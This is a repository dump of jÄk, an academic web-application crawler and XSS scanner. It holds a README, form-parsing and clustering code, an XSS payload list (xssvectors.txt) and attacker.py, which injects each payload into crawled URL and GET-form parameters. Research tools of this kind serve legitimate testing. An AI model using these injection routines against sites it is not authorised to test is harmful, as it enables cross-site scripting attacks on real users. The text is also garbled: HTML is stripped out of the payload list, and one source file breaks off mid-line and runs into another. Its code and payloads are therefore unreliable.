├── .gitignore ├── LICENSE.txt ├── README.md └── crawler ├── analyzer ├── __init__.py ├── helper │ ├── __init__.py │ ├── formhelper.py │ ├── linkhelper.py │ └── propertyhelper.py └── mainanalyzer.py ├── attack ├── __init__.py ├── xss.py ├── xssvectors.txt └── xxxattacks.py ├── attacker.py ├── core ├── __init__.py ├── clustermanager.py ├── eventexecutor.py ├── formhandler.py ├── interactioncore.py ├── jaekcore.py └── jsbridge.py ├── crawler.py ├── database ├── __init__.py ├── database.py └── databasemanager.py ├── example.py ├── experiments_paper.py ├── js ├── addeventlistener_wrapper.js ├── ajax_interceptor.js ├── ajax_observer.js ├── lib.js ├── md5.js ├── property_obs.js └── timing_wrapper.js ├── main.py ├── models ├── __init__.py ├── ajaxrequest.py ├── asyncrequests.py ├── asyncrequeststructure.py ├── clickable.py ├── clickabletype.py ├── deltapage.py ├── enumerations.py ├── form.py ├── keyclickable.py ├── link.py ├── parametertype.py ├── timingrequest.py ├── url.py ├── urlstructure.py ├── utils.py └── webpage.py ├── network ├── __init__.py └── network.py ├── tests ├── __init__.py ├── databasetest.py └── domainhandlertest.py └── utils ├── __init__.py ├── asyncrequesthandler.py ├── config.py ├── domainhandler.py ├── execptions.py ├── requestor.py ├── user.py └── utils.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | lib/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | *.egg-info/ 22 | .installed.cfg 23 | *.egg 24 | .webkit-cache/ 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .cache 41 | nosetests.xml 42 | coverage.xml 43 | 44 | # Translations 45 | *.mo 46 | *.pot 47 | 48 | # Django stuff: 49 | *.log 50 | 51 | # Sphinx documentation 52 | docs/_build/ 53 | 54 | # PyBuilder 55 | target/ 56 | 57 | # Latex 58 | 59 | *.aux 60 | *.glo 61 | *.idx 62 | *.log 63 | *.toc 64 | *.ist 65 | *.acn 66 | *.acr 67 | *.alg 68 | *.bbl 69 | *.blg 70 | *.dvi 71 | *.glg 72 | *.gls 73 | *.ilg 74 | *.ind 75 | *.lof 76 | *.lot 77 | *.maf 78 | *.mtc 79 | *.mtc1 80 | *.out 81 | *.synctex.gz 82 | 83 | # Eclipse 84 | 85 | *.pydevproject 86 | .metadata 87 | .gradle 88 | bin/ 89 | tmp/ 90 | *.tmp 91 | *.bak 92 | *.swp 93 | *~.nib 94 | local.properties 95 | .settings/ 96 | .loadpath 97 | 98 | # External tool builders 99 | .externalToolBuilders/ 100 | 101 | # Locally stored "Eclipse launch configurations" 102 | *.launch 103 | 104 | # CDT-specific 105 | .cproject 106 | 107 | # PDT-specific 108 | .buildpath 109 | 110 | # sbteclipse plugin 111 | .target 112 | 113 | # TeXlipse plugin 114 | .texlipse 115 | 116 | crawler/similarities/ 117 | crawler/result/ 118 | crawler/database/databaselegacy.py 119 | 120 | main2.py 121 | 122 | .idea/ 123 | .project 124 | 125 | README 126 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # jÄk - jet Änother krawler. 2 | 3 | jÄk (or jAEk, pron. Jack) is a web application crawler and scanner which uses dynamic JavaScript code analysis. jÄk installs hooks in JavaScript APIs in order to detect the registration of event handlers, the use of network communication APIs, and dynamically-generated URLs or user forms. It then builds and mantains a navigation graph to crawl and test web applications. 
For more details on the internals please have a look at [my thesis and our paper](#papers-and-further-readings) 4 | 5 | ## Requirements 6 | 7 | jÄk is written in python (version 3) and it is based on [PyQT5](https://riverbankcomputing.com/software/pyqt/intro) (version 5.3 - 5.4). To store data, jÄk uses mongodb via the [pymongo](https://api.mongodb.org/python/current/) 3.x.x bindings. Please, install the required packages using pip, the packages manager of your distribution, or follow the documentation. jÄk also requires [cython](http://cython.org/). 8 | 9 | ## Running jÄk 10 | 11 | The current version of jÄk does not offer a command-line interface. To run jÄk, you will have to write some python code and get familiar with jÄk classes and libraries. The entry point to start using jÄk is [crawler/example.py](https://github.com/ConstantinT/jAEk/blob/master/crawler/example.py). 12 | 13 | ### 1. Configuration Objects 14 | 15 | #### 1.1 Users 16 | jÄk can use user credentials and perform user login. The URL of the login page and the credentials can be configured via the object `utils.user.User`. For example: 17 | 18 | ``` 19 | user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="1") 20 | ``` 21 | Parameters: 22 | 1. Name of the MongoDB database (it can be an arbitrary name) 23 | 2. (Deprecated) Privilege Level of the User (0 is ok) 24 | 3. URL of the login page with the HTML form 25 | 4. Login data for the user login, e.g., `log` and `pwd` are the form input field names 26 | 5. If you want to use the credentials in parallel runs of jÄk with the same database, set >1 27 | 28 | #### 1.2 Crawler and Attacker Configuration 29 | 30 | ``` 31 | url = "http://localhost/" 32 | [...]
33 | crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast) 34 | attack_config = AttackConfig(url) 35 | ``` 36 | 37 | where: 38 | * `max_depth` is the maximum depth of the web application link tree; 39 | * `max_click_depth` is the maximum depth of click event that are fired; 40 | * `crawl_speed` specifies the time that the crawler waits after it loads a page or triggered an event. These are the possible values: 41 | * CrawlSpeed.Slow: 42 | * wait after loading: 1 sec. 43 | * wait after event: 2 sec. 44 | * CrawlSpeed.Medium: 45 | * wait after loading: 0.3 sec. 46 | * wait after event: 1 sec. 47 | * CrawlSpeed.Fast: 48 | * wait after loading: 0.1 sec. 49 | * wait after event: 0.5 sec. 50 | * CrawlSpeed.Speed_of_Lightning: 51 | * wait after loading: 0.01 sec. 52 | * wait after event: 0.1 sec. 53 | 54 | #### 1.3 Database 55 | 56 | ``` 57 | database_manager = DatabaseManager(user, dropping=True) 58 | ``` 59 | 60 | `user` is also an instance of the `User` class. 61 | 62 | ### 2 Setting up the Crawler 63 | 64 | To run the crawler use: 65 | 66 | ``` 67 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager) 68 | crawler.crawl(user) 69 | ``` 70 | 71 | You can also setup an HTTP proxy between the crawler and the web application (e.g., localhost:8082): 72 | 73 | ``` 74 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager, proxy="localhost", port=8082) 75 | crawler.crawl(user) 76 | ``` 77 | 78 | ## Papers and further readings 79 | 80 | * C. Tschürtz. *Improving Crawling with JavaScript Function Hooking* [DE: Verbesserung von Webcrawling durch JavaScript Funktion Hooking]. 81 | * G. Pellegrino, C. Tschürtz, E. Bodden, and C. Rossow. *jÄk: Using Dynamic Analysis to Crawl and Test Modern Web Applications*. Proceedings of Research in Attacks, Intrusions and Defenses (RAID) Symposium (RAID 2015). 
[PDF](http://trouge.net/papers/jAEk_raid2015.pdf) 82 | 83 | ## Contacts 84 | 85 | * C. Tschürtz *[constantin dot tschuertz (at) gmail dot com]* 86 | * G. Pellegrino *[gpellegrino (at) cispa dot saarland]* 87 | 88 | ## License 89 | 90 | jÄk is released under the GNU General Public License version 3 or later (see [LICENSE.txt](https://github.com/ConstantinT/jAEk/blob/master/LICENSE.txt)). 91 | -------------------------------------------------------------------------------- /crawler/analyzer/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see <http://www.gnu.org/licenses/>. 16 | ''' 17 | 18 |
See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' -------------------------------------------------------------------------------- /crawler/analyzer/helper/formhelper.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | import logging 19 | from models.form import HtmlForm, FormInput 20 | 21 | def extract_forms(frame): 22 | result = [] 23 | forms = frame.findAllElements("form") 24 | for form in forms: 25 | action = form.attribute("action") 26 | method = form.attribute("method") if form.attribute("method") == "post" else "get" 27 | dom_address = form.evaluateJavaScript("getXPath(this)") 28 | form_params = _extracting_information(form) 29 | result.append(HtmlForm(form_params, action, method, dom_address)) 30 | return result 31 | 32 | def _extracting_information(elem): 33 | result = [] 34 | inputs = elem.findAll("input") 35 | radio_buttons = {} # key = name, value = array mit values 36 | 37 | for input_el in inputs: 38 | tag_name = input_el.tagName() 39 | if input_el.hasAttribute("type"): 40 | input_type = input_el.attribute("type") 41 | if input_type != "radio": #no radio button 42 | if input_el.hasAttribute("name") or input_type == "submit": 43 | name = input_el.attribute("name") 44 | else: 45 | continue #A input-element without name has no impact, why waste memory? Ok jaek you are alright, if it is a submit element we need it... 
46 | if input_el.hasAttribute("value"): 47 | value = [input_el.attribute("value")] 48 | else: 49 | value = [None] 50 | result.append(FormInput(tag_name, name, input_type, value)) 51 | else: # input is radiobutton 52 | name = input_el.attribute("name") 53 | if name in radio_buttons: # Radio-Button name exists 54 | radio_buttons[name].append(input_el.attribute("value")) 55 | else: #Radiobutton name exists not 56 | radio_buttons[name] = [] 57 | radio_buttons[name].append(input_el.attribute("value")) 58 | else: 59 | if input_el.hasAttribute("name"): 60 | name = input_el.attribute("name") 61 | tag_name = input_el.tagName() 62 | result.append(FormInput(tag_name, name, None, None)) 63 | for key in radio_buttons: 64 | result.append(FormInput(tag_name, key, input_type, radio_buttons[key])) 65 | buttons = elem.findAll("button") 66 | for button in buttons: 67 | tag_name = button.tagName() 68 | if button.hasAttribute("type"): 69 | button_type = button.attribute("type") 70 | else: 71 | button_type = None 72 | if button.hasAttribute("name"): 73 | name = button.attribute("name") 74 | else: 75 | name = None 76 | if button.hasAttribute("value"): 77 | value = [button.attribute("value")] 78 | else: 79 | value = None 80 | result.append(FormInput(tag_name, name, button_type, value)) 81 | 82 | selects = elem.findAll("select")# 19 | 20 | 21 | 22 | .txt 23 | .txt 24 | .txt" 25 |
.txt" 26 |
.txt 27 |
.txt 28 |
.txt 29 | .txt 30 | .txt 31 | IMG SRC=\"  javascript:jsb.attack(XSS);\">.txt 32 | .txt 33 | .txt 34 | .txt 35 | .txt 37 | .txt 38 | .txt 39 | .txt 40 | .txt 41 | .txt 42 | .txt 43 | .txt 44 | .txt 45 | .txt 46 | .txt 47 | .txt 48 | perl -e 'print \"\";' > out.txt 49 | .txt 50 |
.txt 51 | .txt 52 | .txt 53 | 54 | 55 | 56 | 57 | 58 | \"> 59 | 60 | 61 | 62 | 63 | perl -e 'print \"\";' > 64 | 65 | 66 | 67 | 68 | < 69 | 72 | 73 | 74 | 75 | 76 |
  • XSS
    77 | 78 | 79 | 80 | 81 |
    82 | 83 | 84 | 85 | exp/* 86 | 87 | 88 | 89 | 90 | ¼script¾jsb.attack(¢XSS¢)¼/script¾" 91 | 92 | 93 | 94 | 95 | 96 |
    97 |
    98 |
    99 |
    100 | 101 | 102 | a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"jsb.attack(XSS);\\\")\";\neval(a+b+c+d); 103 | cript:jsb.attack(XSS)\">\n 104 | \n 105 | \n\n\njsb.attack(\"XSS\")\">\n 106 | 107 | 108 | jsb.attack(\"XSS\")'); ?> 109 | jsb.attack(XSS)\"> 110 | +ADw-SCRIPT+AD4-jsb.attack(XSS);+ADw-/SCRIPT+AD4- 111 | ;!--\'=&{()}\\xss 112 | "> 113 | < 114 | """" 115 | \\";jsb.attack(\'XSS\');// 116 | -------------------------------------------------------------------------------- /crawler/attack/xxxattacks.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
'''
Copyright (C) 2015 Constantin Tschuertz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''

import logging
import os
import random
import string


__author__ = 'constantin'


# Payload file shipped next to this module; one attack vector per line.
FILENAME = "/xssvectors.txt"


class XSSVectors():
    """Loads the XSS payload catalogue and generates random marker tokens.

    The random tokens are substituted for the literal ``XSS`` placeholder in
    each payload so a reflected payload can be recognised in a response.
    """

    def __init__(self):
        # Use a context manager so the file handle is always closed (the
        # original left it open), and strip only the newline: the previous
        # line[:-1] unconditionally chopped the last character, which would
        # corrupt a final line lacking a trailing newline.
        self.attack_vectors = []
        with open(os.path.dirname(os.path.realpath(__file__)) + FILENAME, "r") as vector_file:
            for line in vector_file:
                self.attack_vectors.append(line.rstrip("\n"))

    def random_string_generator(self, size=6, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):
        """Return a random string of exactly *size* characters drawn from *chars*."""
        return "".join(random.choice(chars) for _ in range(size))

    def random_number_generator(self, size=6):
        """Return a random number with exactly *size* digits, as a string.

        Bug fix: the previous implementation built its bounds with one loop
        iteration too many and therefore always produced ``size + 1`` digits.
        The bounds are now computed directly as [10**(size-1), 10**size - 1].
        """
        return str(random.randint(10 ** (size - 1), 10 ** size - 1))
'''
Copyright (C) 2015 Constantin Tschuertz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''

# crawler/attacker.py -- drives reflected-XSS attacks against the URLs and
# GET forms that the crawler previously collected into the database.

# NOTE(review): asyncio's sleep is a coroutine function; calling it without
# awaiting it (as done below) creates a coroutine object and has no delaying
# effect. time.sleep was probably intended here -- TODO confirm.
from asyncio.tasks import sleep
import logging
import sys
from urllib.parse import urlparse


from attack.xss import XSSAttacker, AttackResult
from attack.xxxattacks import XSSVectors
from core.jaekcore import JaekCore
from models.url import Url
from models.utils import CrawlSpeed
from utils.domainhandler import DomainHandler
from utils.execptions import LoginFailed  # "execptions" is the module's real (misspelled) name



__author__ = 'constantin'

# Number of consecutive "uninteresting" responses after which the remaining
# attack vectors for the current parameter are skipped.
EMPTY_LIMIT = 5


class Attacker(JaekCore):
    """Runs the XSS attack phase over everything stored by the crawl phase.

    Three passes are performed: replacing existing URL parameter values with
    payloads, appending payloads to existing values, and attacking GET forms.
    Each candidate URL is handed to an :class:`XSSAttacker` instance together
    with a random numeric marker that stands in for the ``XSS`` placeholder.
    """

    def __init__(self, config, proxy="", port=0, database_manager=None):
        # NOTE(review): the given proxy/port are NOT forwarded to the base
        # class (literals "" and 0 are passed instead), although they ARE
        # forwarded to the XSSAttacker below -- verify whether intentional.
        super(Attacker, self).__init__(config, proxy="", port=0, database_manager=database_manager)

        self._xss = XSSAttacker(self, proxy, port, crawl_speed=CrawlSpeed.Medium,
                                network_access_manager=self._network_access_manager)

        self._xss_vector = XSSVectors()

    def attack(self, user):
        """Entry point: optionally log in as *user*, then run all attack passes.

        Raises LoginFailed when login data is configured but the initial
        login does not succeed.
        """
        self.domain_handler = DomainHandler(self.config.start_page_url, self.database_manager, cluster_manager=None)
        self.user = user
        if user.login_data is not None:
            self.process_with_login = True
            go_on = self._initial_login()
            if not go_on:
                raise LoginFailed("Initial login failed...")
        self.attack_all_urls_with_replacing()
        self.attack_all_urls_with_additions()
        self.attack_all_get_forms()
        # Leftover single-target debugging calls, kept disabled:
        #url = "http://localhost:8080/index.php/apps/files/ajax/download.php?files=moep&dir=tut"
        #url = "http://localhost:8080/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=t47sx79npgz01tywyeo3wwuuxz03u7vh"
        #url = "http://localhost:8080/admin.php?page=plugin-AdminTool%3Cimg%20onerror%3Dalert(123)%3B%20src%3Dx%3Es"
        #url = "http://localhost:8080/report.php?type=post&pid=1"
        #self.attack_single_url(url, replacement= True)


    def attack_single_url(self, url, replacement=False):
        """Attack one URL. Without *replacement* the URL is sent unmodified;
        with it, every parameter value is replaced by each attack vector in turn.
        """
        if not replacement:
            attack_url = url
            result, response_code = self._xss.attack(attack_url, "123")
            logging.debug("Result: {}".format(result))
            return
        url = Url(url)
        for parameter_to_attack in url.parameters:
            for vector in self._xss_vector.attack_vectors:
                attack_url = url.scheme + "://" + url.domain + url.path + "?"
                random_val = self._xss_vector.random_number_generator(12)
                # NOTE(review): dead assignment -- "ramdom_val" is a typo of
                # random_val (apparently leftover debugging) and is never read.
                ramdom_val = "123"
                for other_parameters in url.parameters:
                    if parameter_to_attack == other_parameters:
                        attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&"
                    else:
                        attack_url += other_parameters + "=" + url.parameters[other_parameters][0] + "&"
                attack_url = attack_url[:-1]  # strip the trailing "&"
                logging.debug("Attack with: {}".format(attack_url))
                result, response_code = self._xss.attack(attack_url, random_val)
                logging.debug("Result: {}".format(result))


    def attack_all_urls_with_additions(self):
        """Attack every stored URL of the target domain by APPENDING each
        vector to the existing value of one parameter at a time.
        """
        domain = urlparse(self.config.start_page_url)
        domain = domain.netloc
        all_urls = self.database_manager.get_all_urls_to_domain(domain)
        for url in all_urls:
            if len(url.parameters) > 0:
                logging.debug("Now testing with url: {}".format(url.toString()))
                if self.process_with_login:
                    self._handle_possible_logout()
                for parameter_to_attack in url.parameters:
                    empty_counter = 0
                    for vector in self._xss_vector.attack_vectors:
                        attack_url = url.scheme + "://" + url.domain + url.path + "?"
                        random_val = self._xss_vector.random_number_generator(12)
                        for other_parameters in url.parameters:
                            if parameter_to_attack == other_parameters:
                                # NOTE(review): operator precedence makes the whole
                                # concatenation the ternary's "true" branch -- when the
                                # parameter value is None the parameter name and "="
                                # are dropped entirely, unlike the else-branch below.
                                # Verify whether that is intended.
                                attack_url += other_parameters + "=" + str(url.parameters[other_parameters][0]) if url.parameters[other_parameters][0] is not None else ""
                                attack_url += vector.replace("XSS", str(random_val)) + "&"
                            else:
                                attack_url += other_parameters + "="
                                attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else ""
                                attack_url += "&"
                        attack_url = attack_url[:-1]  # strip the trailing "&"
                        logging.debug("Attack with: {}".format(attack_url))
                        result, response_code = self._xss.attack(attack_url, random_val)
                        if not self._check_login_status_with_cookies():
                            # NOTE(review): see import note -- this sleep() call is a
                            # bare coroutine and does not actually pause.
                            sleep(2000)
                            self._initial_login()
                            result, response_code = self._xss.attack(attack_url, random_val)
                        if response_code is None:
                            continue
                        if response_code >= 400 or result == AttackResult.JSON:
                            # Force the counter past EMPTY_LIMIT so the remaining
                            # vectors for this parameter are skipped.
                            empty_counter = 42
                        logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
                        if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
                            self.database_manager.insert_attack_result(result, attack_url)
                            empty_counter = 0
                        else:
                            empty_counter += 1
                        if empty_counter > EMPTY_LIMIT:
                            break



    def attack_all_urls_with_replacing(self):
        """Attack one representative URL per URL structure by REPLACING the
        value of one parameter at a time with each vector.
        """
        all_urls = self.database_manager.get_one_visited_url_per_structure()
        for url in all_urls:
            if len(url.parameters) > 0:
                logging.debug("Now testing with url: {}".format(url.toString()))
                if self.process_with_login:
                    self._handle_possible_logout()
                for parameter_to_attack in url.parameters:
                    empty_counter = 0
                    for vector in self._xss_vector.attack_vectors:
                        attack_url = url.scheme + "://" + url.domain + url.path + "?"
                        random_val = self._xss_vector.random_number_generator(12)
                        for other_parameters in url.parameters:
                            if parameter_to_attack == other_parameters:
                                attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&"
                            else:
                                attack_url += other_parameters + "="
                                attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else ""
                                attack_url += "&"
                        attack_url = attack_url[:-1]  # strip the trailing "&"
                        logging.debug("Attack with: {}".format(attack_url))
                        result, response_code = self._xss.attack(attack_url, random_val)
                        if not self._check_login_status_with_cookies():
                            # NOTE(review): bare coroutine -- does not actually pause.
                            sleep(2000)
                            self._initial_login()
                            result, response_code = self._xss.attack(attack_url, random_val)
                        if response_code is None:
                            continue
                        if response_code >= 400 or result == AttackResult.JSON:
                            empty_counter = 42  # skip the remaining vectors
                        logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
                        if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
                            self.database_manager.insert_attack_result(result, attack_url)
                            empty_counter = 0
                        else:
                            empty_counter += 1
                        if empty_counter > EMPTY_LIMIT:
                            break

    def attack_all_get_forms(self):
        """Attack one GET form per destination, injecting each vector into one
        form parameter at a time and filling the others with stored or random values.
        """
        if self.process_with_login:
            self._handle_possible_logout()
        logging.debug("Attacking with get forms")
        all_forms = self.database_manager.get_one_form_per_destination()
        for form in all_forms:
            logging.debug(form.toString())
            if "javascript" in form.action.complete_url:
                continue  # javascript: pseudo-URLs cannot be requested
            for param_to_attack in form.parameter:
                if param_to_attack.input_type == "submit" or param_to_attack.name is None:
                    continue  # submit buttons / unnamed inputs carry no injectable value
                logging.debug("Now at paramerter {}".format(param_to_attack.toString()))
                empty_counter = 0
                for vector in self._xss_vector.attack_vectors:
                    attack_url = form.action.complete_url + "?"
                    random_val = self._xss_vector.random_number_generator(12)
                    for other_parameter in form.parameter:
                        if param_to_attack == other_parameter:
                            if other_parameter is None or other_parameter.name is None:
                                continue
                            attack_url += other_parameter.name + "=" + vector.replace("XSS", random_val) + "&"
                        else:
                            if other_parameter.input_type == "submit" or other_parameter.name is None:
                                continue
                            elif other_parameter.values is None:
                                attack_url += other_parameter.name + "=&"
                            elif other_parameter.values[0] is not None:
                                attack_url += other_parameter.name + "=" + other_parameter.values[0] + "&"
                            else:
                                # No stored value -- fill with a random string.
                                attack_url += other_parameter.name + "=" + self._xss_vector.random_string_generator(6) + "&"
                    attack_url = attack_url[:-1]  # strip the trailing "&"
                    logging.debug("Attack with: {}".format(attack_url))
                    result, response_code = self._xss.attack(attack_url, random_val)
                    if not self._check_login_status_with_cookies():
                        # NOTE(review): bare coroutine -- does not actually pause.
                        sleep(2000)
                        self._initial_login()
                        result, response_code = self._xss.attack(attack_url, random_val)
                    if response_code is None:
                        continue
                    if response_code >= 400 or result == AttackResult.JSON:
                        empty_counter = 42  # skip the remaining vectors
                    logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
                    if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
                        self.database_manager.insert_attack_result(result, attack_url)
                        empty_counter = 0
                    else:
                        empty_counter += 1
                    if empty_counter > EMPTY_LIMIT:
                        break
published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' -------------------------------------------------------------------------------- /crawler/core/clustermanager.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
'''
Copyright (C) 2015 Constantin Tschuertz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''

import itertools
import logging


__author__ = 'constantin'

# Two clusters are merged while their minimum pairwise page distance is at most
# this threshold; it is also the clusters-per-visited-URLs ratio below which an
# URL structure counts as sufficiently explored.
CLUSTER_THRESHOLD = .2


class ClusterManager():
    """
    A cluster is a collection of similar pages, defined through a cluster function.

    Clusters are persisted via the injected persistence manager as lists of
    page ids keyed by the hash of the URL structure they belong to.
    """

    def __init__(self, persistence_manager):
        self._persistence_manager = persistence_manager
        # Cache of pairwise page-similarity results, keyed by "smallerId$largerId".
        self._similarity_cache = {}
        # In-memory cluster view used by get_clusters/get_cluster.
        # Bug fix: the original never initialised this attribute, so those
        # accessors raised AttributeError instead of the documented KeyError.
        self._clusters = {}

    @property
    def get_clusters(self):
        """The in-memory mapping of url description -> clusters."""
        return self._clusters

    def get_cluster(self, url_description):
        """Return the clusters stored under *url_description*.

        Raises:
            KeyError: if no cluster with that id is known.
        """
        try:
            return self._clusters[url_description].values()
        except KeyError:
            # Narrowed from a bare except: only a missing key means "not found".
            raise KeyError("No cluster with that id found") from None

    def add_webpage_to_cluster(self, webpage):
        """Insert *webpage* into the clusters of its URL structure and re-cluster."""
        # Deferred import so this module can be imported without the full
        # project context on the path.
        from models.url import Url
        url = Url(webpage.url)
        clusters = self._persistence_manager.get_clusters(url.url_hash)
        if clusters is None:
            # First page for this URL structure: a single one-element cluster.
            self._persistence_manager.write_clusters(url.url_hash, [webpage.id])
            return
        # Flatten the stored clusters into a plain list of page ids.
        page_ids = []
        for stored in clusters:
            if isinstance(stored, list):
                page_ids.extend(stored)
            else:
                page_ids.append(stored)
        page_ids.append(webpage.id)
        new_clusters = self.hierarchical_clustering(page_ids, CLUSTER_THRESHOLD)
        # Wrap bare ids in single-element lists so Mongo stores every cluster
        # as its own list.  Bug fix: the original removed/inserted elements of
        # the list *while iterating it*, which can skip entries.
        new_clusters = [[c] if isinstance(c, int) else c for c in new_clusters]
        self._persistence_manager.write_clusters(url.url_hash, new_clusters)

    def hierarchical_clustering(self, clusters, threshold):
        """Agglomeratively merge *clusters* (ids or tuples of ids) until the
        closest pair is farther apart than *threshold*.

        The input list is no longer mutated (the original modified it in place).
        """
        remaining = list(clusters)
        while len(remaining) > 1:
            pairs = list(itertools.combinations(remaining, 2))
            distances = []
            for left, right in pairs:
                distances.append((self.calculate_minimum_distance(left, right), left, right))
            best = min(distances, key=lambda entry: entry[0])
            if best[0] > threshold:
                break
            remaining.remove(best[1])
            remaining.remove(best[2])
            # Normalise both members to tuples before concatenating them.
            merged_left = (best[1],) if isinstance(best[1], int) else best[1]
            merged_right = (best[2],) if isinstance(best[2], int) else best[2]
            remaining.append(merged_left + merged_right)
        return remaining

    def calculate_minimum_distance(self, cluster1, cluster2):
        """Single-linkage distance: the smallest pairwise page distance between
        any page of *cluster1* and any page of *cluster2*.
        """
        if isinstance(cluster1, int):
            cluster1 = [cluster1]
        else:
            cluster1 = list(cluster1)
        if isinstance(cluster2, int):
            cluster2 = [cluster2]
        else:
            cluster2 = list(cluster2)
        all_nodes = cluster1 + cluster2
        distances = []
        for first, second in itertools.combinations(all_nodes, 2):
            # Skip intra-cluster pairs; only cross-cluster distances matter.
            if (first in cluster1 and second in cluster1) or (first in cluster2 and second in cluster2):
                continue
            distances.append((first, second, self.calculate_distance(first, second)))
        return min(distances, key=lambda entry: entry[2])[2]

    def calculate_distance(self, x, y):
        """Return 1 - similarity of pages *x* and *y*, memoised in the cache."""
        # Deferred import so this module can be imported without the full
        # project context on the path.
        from utils.utils import calculate_similarity_between_pages
        name = self.get_similarity_identifier(x, y)
        if name in self._similarity_cache:
            result = self._similarity_cache[name]
        else:
            page_x = self._persistence_manager.get_web_page_to_id(x)
            page_y = self._persistence_manager.get_web_page_to_id(y)
            result = calculate_similarity_between_pages(page_x, page_y, verbose=True)
            self._similarity_cache[name] = result
        return 1 - result

    def get_similarity_identifier(self, x, y):
